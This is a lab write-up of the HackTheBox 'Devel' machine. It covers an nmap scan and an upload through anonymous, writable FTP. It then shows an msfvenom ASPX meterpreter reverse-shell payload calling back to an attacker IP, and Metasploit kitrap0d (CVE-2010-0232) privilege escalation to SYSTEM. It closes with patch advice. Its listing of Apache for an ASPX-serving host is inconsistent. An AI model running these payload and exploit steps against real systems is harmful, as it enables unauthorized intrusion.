This is a writeup for the Devel machine from the HackTheBox site.
Enumeration #
First, let’s start with a scan of our target with the following command:
nmap -sV -T4 -Pn 10.10.10.5
Two TCP ports are discovered:
- 21/tcp : FTP (ftpd)
- 80/tcp : HTTP web server (Apache 2.4.41)
Exploit #
I start by seeing if it is possible to connect to FTP as anonymous:
In addition to being able to read, we have the ability to write, so I create a payload to make a reverse shell with the following command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f aspx -o shell.aspx
I upload it then with the help of Metasploit I launch a TCP handler to create a meterpreter.
I then access my previously uploaded payload at the following address:
http://10.10.10.5/shell.aspx
I now have a reverse shell on the machine.
Privilege escalation #
I pause the meterpreter with CRTL+Z. Then to try to determine some feats, I use the following module on Metasploit.
use post/multi/recon/local_exploit_suggester
set SESSION 19
exploit
The module has found a number of potential exploits.
I start by testing the first one:
use windows/local/bypassuac_eventtvwr
set SESSION 19
exploit
But without success. I test the second one:
use windows/local/ms10_015_kitrap0d
set SESSION 19
exploit
This one worked, I now have a reverse shell with the NT AUTHORITY\SYSTEM authorization.
The module MS10_015 is linked to CVE-2010-0232.
[…] when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges […] VK9 Security
I can now get both flags back.
Recommendations #
To patch this host I think it would be necessary to perform a number of actions:
- Disable writing to the FTP server as
anonymous - Update Windows to patch CVE-2010-0232